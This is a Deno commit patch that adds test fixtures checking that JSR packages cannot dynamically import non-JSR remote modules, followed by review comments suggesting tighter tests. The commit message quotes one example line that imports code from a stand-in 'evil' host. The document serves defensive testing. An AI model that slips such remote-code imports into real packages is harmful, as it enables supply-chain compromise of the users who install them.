From 918c5e648f4bd08d768374ccde1b451b84793b76 Mon Sep 17 00:00:00 2001
From: David Sherret
Date: Wed, 28 Feb 2024 16:30:45 -0500
Subject: fix(jsr): do not allow importing a non-JSR url via unanalyzable dynamic import from JSR (#22623)
A security feature of JSR is that it is self contained other than npm dependencies. At publish time, the registry rejects packages that write code like this:
```ts
const data = await import("https://example.com/evil.js");
```
However, this can be trivially bypassed by writing code that the registry cannot statically analyze for. This PR prevents Deno from loading dynamic imports that do this.
---
tests/testdata/jsr/import_https_url/analyzable.out | 8 ++++++++
tests/testdata/jsr/import_https_url/analyzable.ts | 1 +
tests/testdata/jsr/import_https_url/unanalyzable.out | 7 +++++++
tests/testdata/jsr/import_https_url/unanalyzable.ts | 1 +
4 files changed, 17 insertions(+)
create mode 100644 tests/testdata/jsr/import_https_url/analyzable.out
create mode 100644 tests/testdata/jsr/import_https_url/analyzable.ts
create mode 100644 tests/testdata/jsr/import_https_url/unanalyzable.out
create mode 100644 tests/testdata/jsr/import_https_url/unanalyzable.ts
(limited to 'tests/testdata/jsr/import_https_url')
diff --git a/tests/testdata/jsr/import_https_url/analyzable.out b/tests/testdata/jsr/import_https_url/analyzable.out
new file mode 100644
index 000000000..dd1ca58b4
--- /dev/null
+++ b/tests/testdata/jsr/import_https_url/analyzable.out
@@ -0,0 +1,8 @@
+Download http://127.0.0.1:4250/@denotest/import-https-url/meta.json
+Download http://127.0.0.1:4250/@denotest/import-https-url/1.0.0_meta.json
+Download http://127.0.0.1:4250/@denotest/import-https-url/1.0.0/analyzable.ts
+Download http://localhost:4545/welcome.ts
+error: Uncaught (in promise) TypeError: Importing http://localhost:4545/welcome.ts blocked. JSR packages cannot import non-JSR remote modules for security reasons.
+await import("http://localhost:4545/welcome.ts");
+^
+ at async http://127.0.0.1:4250/@denotest/import-https-url/1.0.0/analyzable.ts:1:1
diff --git a/tests/testdata/jsr/import_https_url/analyzable.ts b/tests/testdata/jsr/import_https_url/analyzable.ts
new file mode 100644
index 000000000..44382867f
--- /dev/null
+++ b/tests/testdata/jsr/import_https_url/analyzable.ts
@@ -0,0 +1 @@
+import "jsr:@denotest/import-https-url/analyzable";
diff --git a/tests/testdata/jsr/import_https_url/unanalyzable.out b/tests/testdata/jsr/import_https_url/unanalyzable.out
new file mode 100644
index 000000000..4ae04996c
--- /dev/null
+++ b/tests/testdata/jsr/import_https_url/unanalyzable.out
@@ -0,0 +1,7 @@
+Download http://127.0.0.1:4250/@denotest/import-https-url/meta.json
+Download http://127.0.0.1:4250/@denotest/import-https-url/1.0.0_meta.json
+Download http://127.0.0.1:4250/@denotest/import-https-url/1.0.0/unanalyzable.ts
+error: Uncaught (in promise) TypeError: Importing http://localhost:4545/welcome.ts blocked. JSR packages cannot import non-JSR remote modules for security reasons.
+await import(nonAnalyzableUrl());
+^
+ at async http://127.0.0.1:4250/@denotest/import-https-url/1.0.0/unanalyzable.ts:5:1
diff --git a/tests/testdata/jsr/import_https_url/unanalyzable.ts b/tests/testdata/jsr/import_https_url/unanalyzable.ts
new file mode 100644
index 000000000..87ccdcfdc
--- /dev/null
+++ b/tests/testdata/jsr/import_https_url/unanalyzable.ts
@@ -0,0 +1 @@
+import "jsr:@denotest/import-https-url/unanalyzable";
-- cgit v1.2.3
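Review bot: In analyzable.out the expected line `Download http://localhost:4545/welcome.ts` comes before the `Importing http://localhost:4545/welcome.ts blocked` error, so for the statically analyzable case the runtime still fetches the non-JSR module and only rejects it afterwards, whereas unanalyzable.out shows no such download. Fetching before blocking means a JSR package can still trigger an outbound request to an attacker-chosen URL (an exfiltration channel through the URL itself) even though the fetched code never runs; the check presumably belongs at specifier resolution, before any download, as the unanalyzable path already appears to do. If the implementation is moved earlier, this expected output should drop the `Download http://localhost:4545/welcome.ts` line so the test pins the no-fetch behaviour rather than tolerating it. The implementation hunks are outside this listing (the view is limited to the test directory), so this is inferred from the expected output alone.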
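Review bot: Both new fixtures only exercise an `http://` URL to the local test server, and the package source that produces `nonAnalyzableUrl()` is not in this listing, so it is not visible which form of obfuscation the unanalyzable case actually covers. Since the commit describes this as closing a bypass of the registry's static check, it would be worth a second unanalyzable fixture for another scheme that the message `cannot import non-JSR remote modules` is meant to cover (e.g. `https://`), plus a positive fixture showing that a dynamically computed `jsr:` or `npm:` specifier is still permitted, so the block is pinned as neither too narrow nor too broad. A one-line comment at the top of the unanalyzable.ts entry, such as `// Dynamic import of a non-JSR URL hidden from JSR's publish-time analysis; must be blocked at runtime`, would also make the intent of the fixture clear to the next reader.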